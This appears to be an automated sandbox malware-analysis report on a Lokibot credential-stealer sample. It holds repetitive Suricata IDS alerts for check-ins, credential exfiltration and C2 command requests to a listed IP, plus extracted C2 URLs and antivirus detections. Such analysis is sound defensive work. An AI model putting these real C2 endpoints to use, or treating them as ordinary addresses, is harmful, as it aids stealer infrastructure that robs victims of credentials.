                      2024-10-25T10:21:21.441410+020020216411A Network Trojan was detected192.168.2.44992494.156.177.22080TCP
                      2024-10-25T10:21:22.907366+020020216411A Network Trojan was detected192.168.2.44993494.156.177.22080TCP
                      2024-10-25T10:21:24.073735+020020216411A Network Trojan was detected192.168.2.44994094.156.177.22080TCP
                      2024-10-25T10:21:25.575978+020020216411A Network Trojan was detected192.168.2.44994794.156.177.22080TCP
                      2024-10-25T10:21:26.705064+020020216411A Network Trojan was detected192.168.2.44995494.156.177.22080TCP
                      2024-10-25T10:21:27.827107+020020216411A Network Trojan was detected192.168.2.44996394.156.177.22080TCP
                      2024-10-25T10:21:28.952302+020020216411A Network Trojan was detected192.168.2.44996994.156.177.22080TCP
                      2024-10-25T10:21:30.120093+020020216411A Network Trojan was detected192.168.2.44997594.156.177.22080TCP
                      2024-10-25T10:21:31.244679+020020216411A Network Trojan was detected192.168.2.44998594.156.177.22080TCP
                      2024-10-25T10:21:32.352236+020020216411A Network Trojan was detected192.168.2.44999194.156.177.22080TCP
                      2024-10-25T10:21:33.496323+020020216411A Network Trojan was detected192.168.2.44999894.156.177.22080TCP
                      2024-10-25T10:21:34.650472+020020216411A Network Trojan was detected192.168.2.45000594.156.177.22080TCP
                      2024-10-25T10:21:35.782292+020020216411A Network Trojan was detected192.168.2.45001494.156.177.22080TCP
                      2024-10-25T10:21:36.922599+020020216411A Network Trojan was detected192.168.2.45002194.156.177.22080TCP
                      2024-10-25T10:21:38.071599+020020216411A Network Trojan was detected192.168.2.45002794.156.177.22080TCP
                      2024-10-25T10:21:39.204843+020020216411A Network Trojan was detected192.168.2.45003394.156.177.22080TCP
                      2024-10-25T10:21:40.499810+020020216411A Network Trojan was detected192.168.2.45003994.156.177.22080TCP
                      2024-10-25T10:21:41.653914+020020216411A Network Trojan was detected192.168.2.45005094.156.177.22080TCP
                      2024-10-25T10:21:42.775266+020020216411A Network Trojan was detected192.168.2.45005694.156.177.22080TCP
                      2024-10-25T10:21:43.937769+020020216411A Network Trojan was detected192.168.2.45006294.156.177.22080TCP
                      2024-10-25T10:21:45.077227+020020216411A Network Trojan was detected192.168.2.45007394.156.177.22080TCP
                      2024-10-25T10:21:46.202323+020020216411A Network Trojan was detected192.168.2.45007894.156.177.22080TCP
                      2024-10-25T10:21:47.377458+020020216411A Network Trojan was detected192.168.2.45008594.156.177.22080TCP
                      2024-10-25T10:21:48.502508+020020216411A Network Trojan was detected192.168.2.45008894.156.177.22080TCP
                      2024-10-25T10:21:49.659829+020020216411A Network Trojan was detected192.168.2.45008994.156.177.22080TCP
                      2024-10-25T10:21:51.498324+020020216411A Network Trojan was detected192.168.2.45009094.156.177.22080TCP
                      2024-10-25T10:21:52.518212+020020216411A Network Trojan was detected192.168.2.45009194.156.177.22080TCP
                      2024-10-25T10:21:53.649173+020020216411A Network Trojan was detected192.168.2.45009294.156.177.22080TCP
                      2024-10-25T10:21:54.809440+020020216411A Network Trojan was detected192.168.2.45009394.156.177.22080TCP
                      2024-10-25T10:21:55.924734+020020216411A Network Trojan was detected192.168.2.45009494.156.177.22080TCP
                      2024-10-25T10:21:57.172837+020020216411A Network Trojan was detected192.168.2.45009594.156.177.22080TCP
                      2024-10-25T10:21:58.339192+020020216411A Network Trojan was detected192.168.2.45009694.156.177.22080TCP
                      2024-10-25T10:21:59.527535+020020216411A Network Trojan was detected192.168.2.45009794.156.177.22080TCP
                      2024-10-25T10:22:01.017571+020020216411A Network Trojan was detected192.168.2.45009894.156.177.22080TCP
                      2024-10-25T10:22:02.183819+020020216411A Network Trojan was detected192.168.2.45009994.156.177.22080TCP
                      2024-10-25T10:22:04.446102+020020216411A Network Trojan was detected192.168.2.45010094.156.177.22080TCP
                      2024-10-25T10:22:05.576112+020020216411A Network Trojan was detected192.168.2.45010194.156.177.22080TCP
                      2024-10-25T10:22:06.709690+020020216411A Network Trojan was detected192.168.2.45010294.156.177.22080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-25T10:20:01.424022+020028257661Malware Command and Control Activity Detected192.168.2.44973094.156.177.22080TCP
                      2024-10-25T10:20:03.047948+020028257661Malware Command and Control Activity Detected192.168.2.44973194.156.177.22080TCP
                      2024-10-25T10:20:04.092936+020028257661Malware Command and Control Activity Detected192.168.2.44973294.156.177.22080TCP
                      2024-10-25T10:20:05.231108+020028257661Malware Command and Control Activity Detected192.168.2.44973394.156.177.22080TCP
                      2024-10-25T10:20:06.375575+020028257661Malware Command and Control Activity Detected192.168.2.44973494.156.177.22080TCP
                      2024-10-25T10:20:07.485394+020028257661Malware Command and Control Activity Detected192.168.2.44973594.156.177.22080TCP
                      2024-10-25T10:20:09.597188+020028257661Malware Command and Control Activity Detected192.168.2.44973694.156.177.22080TCP
                      2024-10-25T10:20:10.715160+020028257661Malware Command and Control Activity Detected192.168.2.44973794.156.177.22080TCP
                      2024-10-25T10:20:12.310127+020028257661Malware Command and Control Activity Detected192.168.2.44973894.156.177.22080TCP
                      2024-10-25T10:20:13.452612+020028257661Malware Command and Control Activity Detected192.168.2.44973994.156.177.22080TCP
                      2024-10-25T10:20:14.593029+020028257661Malware Command and Control Activity Detected192.168.2.44974094.156.177.22080TCP
                      2024-10-25T10:20:15.751617+020028257661Malware Command and Control Activity Detected192.168.2.44974194.156.177.22080TCP
                      2024-10-25T10:20:16.872789+020028257661Malware Command and Control Activity Detected192.168.2.44974494.156.177.22080TCP
                      2024-10-25T10:20:18.205156+020028257661Malware Command and Control Activity Detected192.168.2.44974794.156.177.22080TCP
                      2024-10-25T10:20:19.310464+020028257661Malware Command and Control Activity Detected192.168.2.44974994.156.177.22080TCP
                      2024-10-25T10:20:21.380407+020028257661Malware Command and Control Activity Detected192.168.2.44975194.156.177.22080TCP
                      2024-10-25T10:20:22.549457+020028257661Malware Command and Control Activity Detected192.168.2.44975294.156.177.22080TCP
                      2024-10-25T10:20:23.684073+020028257661Malware Command and Control Activity Detected192.168.2.44975394.156.177.22080TCP
                      2024-10-25T10:20:24.816660+020028257661Malware Command and Control Activity Detected192.168.2.44975494.156.177.22080TCP
                      2024-10-25T10:20:25.965151+020028257661Malware Command and Control Activity Detected192.168.2.44975594.156.177.22080TCP
                      2024-10-25T10:20:27.717963+020028257661Malware Command and Control Activity Detected192.168.2.44975694.156.177.22080TCP
                      2024-10-25T10:20:29.863609+020028257661Malware Command and Control Activity Detected192.168.2.44975794.156.177.22080TCP
                      2024-10-25T10:20:30.997406+020028257661Malware Command and Control Activity Detected192.168.2.44975894.156.177.22080TCP
                      2024-10-25T10:20:32.176322+020028257661Malware Command and Control Activity Detected192.168.2.44975994.156.177.22080TCP
                      2024-10-25T10:20:33.687799+020028257661Malware Command and Control Activity Detected192.168.2.44976094.156.177.22080TCP
                      2024-10-25T10:20:34.810261+020028257661Malware Command and Control Activity Detected192.168.2.44976194.156.177.22080TCP
                      2024-10-25T10:20:35.916782+020028257661Malware Command and Control Activity Detected192.168.2.44976294.156.177.22080TCP
                      2024-10-25T10:20:37.046303+020028257661Malware Command and Control Activity Detected192.168.2.44976394.156.177.22080TCP
                      2024-10-25T10:20:38.200499+020028257661Malware Command and Control Activity Detected192.168.2.44976494.156.177.22080TCP
                      2024-10-25T10:20:39.822243+020028257661Malware Command and Control Activity Detected192.168.2.44976594.156.177.22080TCP
                      2024-10-25T10:20:40.950583+020028257661Malware Command and Control Activity Detected192.168.2.44976694.156.177.22080TCP
                      2024-10-25T10:20:42.434571+020028257661Malware Command and Control Activity Detected192.168.2.44976794.156.177.22080TCP
                      2024-10-25T10:20:43.576012+020028257661Malware Command and Control Activity Detected192.168.2.44976894.156.177.22080TCP
                      2024-10-25T10:20:44.753726+020028257661Malware Command and Control Activity Detected192.168.2.44976994.156.177.22080TCP
                      2024-10-25T10:20:45.967783+020028257661Malware Command and Control Activity Detected192.168.2.44977094.156.177.22080TCP
                      2024-10-25T10:20:47.090625+020028257661Malware Command and Control Activity Detected192.168.2.44977194.156.177.22080TCP
                      2024-10-25T10:20:48.628754+020028257661Malware Command and Control Activity Detected192.168.2.44977294.156.177.22080TCP
                      2024-10-25T10:20:49.450869+020028257661Malware Command and Control Activity Detected192.168.2.44977394.156.177.22080TCP
                      2024-10-25T10:20:50.632516+020028257661Malware Command and Control Activity Detected192.168.2.44977494.156.177.22080TCP
                      2024-10-25T10:20:52.029076+020028257661Malware Command and Control Activity Detected192.168.2.44977594.156.177.22080TCP
                      2024-10-25T10:20:53.168380+020028257661Malware Command and Control Activity Detected192.168.2.44977694.156.177.22080TCP
                      2024-10-25T10:20:54.305428+020028257661Malware Command and Control Activity Detected192.168.2.44977794.156.177.22080TCP
                      2024-10-25T10:20:55.471024+020028257661Malware Command and Control Activity Detected192.168.2.44977994.156.177.22080TCP
                      2024-10-25T10:20:56.594180+020028257661Malware Command and Control Activity Detected192.168.2.44978094.156.177.22080TCP
                      2024-10-25T10:20:58.015959+020028257661Malware Command and Control Activity Detected192.168.2.44978294.156.177.22080TCP
                      2024-10-25T10:20:59.156243+020028257661Malware Command and Control Activity Detected192.168.2.44979394.156.177.22080TCP
                      2024-10-25T10:21:00.311298+020028257661Malware Command and Control Activity Detected192.168.2.44979994.156.177.22080TCP
                      2024-10-25T10:21:01.419074+020028257661Malware Command and Control Activity Detected192.168.2.44980594.156.177.22080TCP
                      2024-10-25T10:21:02.575992+020028257661Malware Command and Control Activity Detected192.168.2.44981194.156.177.22080TCP
                      2024-10-25T10:21:04.300437+020028257661Malware Command and Control Activity Detected192.168.2.44982294.156.177.22080TCP
                      2024-10-25T10:21:05.450685+020028257661Malware Command and Control Activity Detected192.168.2.44982894.156.177.22080TCP
                      2024-10-25T10:21:06.702578+020028257661Malware Command and Control Activity Detected192.168.2.44983694.156.177.22080TCP
                      2024-10-25T10:21:07.823534+020028257661Malware Command and Control Activity Detected192.168.2.44984294.156.177.22080TCP
                      2024-10-25T10:21:08.970566+020028257661Malware Command and Control Activity Detected192.168.2.44985194.156.177.22080TCP
                      2024-10-25T10:21:10.210497+020028257661Malware Command and Control Activity Detected192.168.2.44985894.156.177.22080TCP
                      2024-10-25T10:21:11.347066+020028257661Malware Command and Control Activity Detected192.168.2.44986494.156.177.22080TCP
                      2024-10-25T10:21:12.693350+020028257661Malware Command and Control Activity Detected192.168.2.44987194.156.177.22080TCP
                      2024-10-25T10:21:13.812456+020028257661Malware Command and Control Activity Detected192.168.2.44987794.156.177.22080TCP
                      2024-10-25T10:21:14.957762+020028257661Malware Command and Control Activity Detected192.168.2.44988394.156.177.22080TCP
                      2024-10-25T10:21:16.552285+020028257661Malware Command and Control Activity Detected192.168.2.44989494.156.177.22080TCP
                      2024-10-25T10:21:17.694981+020028257661Malware Command and Control Activity Detected192.168.2.44990094.156.177.22080TCP
                      2024-10-25T10:21:19.204894+020028257661Malware Command and Control Activity Detected192.168.2.44991094.156.177.22080TCP
                      2024-10-25T10:21:20.326057+020028257661Malware Command and Control Activity Detected192.168.2.44991794.156.177.22080TCP
                      2024-10-25T10:21:21.441410+020028257661Malware Command and Control Activity Detected192.168.2.44992494.156.177.22080TCP
                      2024-10-25T10:21:22.907366+020028257661Malware Command and Control Activity Detected192.168.2.44993494.156.177.22080TCP
                      2024-10-25T10:21:24.073735+020028257661Malware Command and Control Activity Detected192.168.2.44994094.156.177.22080TCP
                      2024-10-25T10:21:25.575978+020028257661Malware Command and Control Activity Detected192.168.2.44994794.156.177.22080TCP
                      2024-10-25T10:21:26.705064+020028257661Malware Command and Control Activity Detected192.168.2.44995494.156.177.22080TCP
                      2024-10-25T10:21:27.827107+020028257661Malware Command and Control Activity Detected192.168.2.44996394.156.177.22080TCP
                      2024-10-25T10:21:28.952302+020028257661Malware Command and Control Activity Detected192.168.2.44996994.156.177.22080TCP
                      2024-10-25T10:21:30.120093+020028257661Malware Command and Control Activity Detected192.168.2.44997594.156.177.22080TCP
                      2024-10-25T10:21:31.244679+020028257661Malware Command and Control Activity Detected192.168.2.44998594.156.177.22080TCP
                      2024-10-25T10:21:32.352236+020028257661Malware Command and Control Activity Detected192.168.2.44999194.156.177.22080TCP
                      2024-10-25T10:21:33.496323+020028257661Malware Command and Control Activity Detected192.168.2.44999894.156.177.22080TCP
                      2024-10-25T10:21:34.650472+020028257661Malware Command and Control Activity Detected192.168.2.45000594.156.177.22080TCP
                      2024-10-25T10:21:35.782292+020028257661Malware Command and Control Activity Detected192.168.2.45001494.156.177.22080TCP
                      2024-10-25T10:21:36.922599+020028257661Malware Command and Control Activity Detected192.168.2.45002194.156.177.22080TCP
                      2024-10-25T10:21:38.071599+020028257661Malware Command and Control Activity Detected192.168.2.45002794.156.177.22080TCP
                      2024-10-25T10:21:39.204843+020028257661Malware Command and Control Activity Detected192.168.2.45003394.156.177.22080TCP
                      2024-10-25T10:21:40.499810+020028257661Malware Command and Control Activity Detected192.168.2.45003994.156.177.22080TCP
                      2024-10-25T10:21:41.653914+020028257661Malware Command and Control Activity Detected192.168.2.45005094.156.177.22080TCP
                      2024-10-25T10:21:42.775266+020028257661Malware Command and Control Activity Detected192.168.2.45005694.156.177.22080TCP
                      2024-10-25T10:21:43.937769+020028257661Malware Command and Control Activity Detected192.168.2.45006294.156.177.22080TCP
                      2024-10-25T10:21:45.077227+020028257661Malware Command and Control Activity Detected192.168.2.45007394.156.177.22080TCP
                      2024-10-25T10:21:46.202323+020028257661Malware Command and Control Activity Detected192.168.2.45007894.156.177.22080TCP
                      2024-10-25T10:21:47.377458+020028257661Malware Command and Control Activity Detected192.168.2.45008594.156.177.22080TCP
                      2024-10-25T10:21:48.502508+020028257661Malware Command and Control Activity Detected192.168.2.45008894.156.177.22080TCP
                      2024-10-25T10:21:49.659829+020028257661Malware Command and Control Activity Detected192.168.2.45008994.156.177.22080TCP
                      2024-10-25T10:21:51.498324+020028257661Malware Command and Control Activity Detected192.168.2.45009094.156.177.22080TCP
                      2024-10-25T10:21:52.518212+020028257661Malware Command and Control Activity Detected192.168.2.45009194.156.177.22080TCP
                      2024-10-25T10:21:53.649173+020028257661Malware Command and Control Activity Detected192.168.2.45009294.156.177.22080TCP
                      2024-10-25T10:21:54.809440+020028257661Malware Command and Control Activity Detected192.168.2.45009394.156.177.22080TCP
                      2024-10-25T10:21:55.924734+020028257661Malware Command and Control Activity Detected192.168.2.45009494.156.177.22080TCP
                      2024-10-25T10:21:57.172837+020028257661Malware Command and Control Activity Detected192.168.2.45009594.156.177.22080TCP
                      2024-10-25T10:21:58.339192+020028257661Malware Command and Control Activity Detected192.168.2.45009694.156.177.22080TCP
                      2024-10-25T10:21:59.527535+020028257661Malware Command and Control Activity Detected192.168.2.45009794.156.177.22080TCP
                      2024-10-25T10:22:01.017571+020028257661Malware Command and Control Activity Detected192.168.2.45009894.156.177.22080TCP
                      2024-10-25T10:22:02.183819+020028257661Malware Command and Control Activity Detected192.168.2.45009994.156.177.22080TCP
                      2024-10-25T10:22:04.446102+020028257661Malware Command and Control Activity Detected192.168.2.45010094.156.177.22080TCP
                      2024-10-25T10:22:05.576112+020028257661Malware Command and Control Activity Detected192.168.2.45010194.156.177.22080TCP
                      2024-10-25T10:22:06.709690+020028257661Malware Command and Control Activity Detected192.168.2.45010294.156.177.22080TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeAvira: detected
                      Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeReversingLabs: Detection: 97%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeJoe Sandbox ML: detected
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49774
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49764
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49822 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49772
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49822 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49759
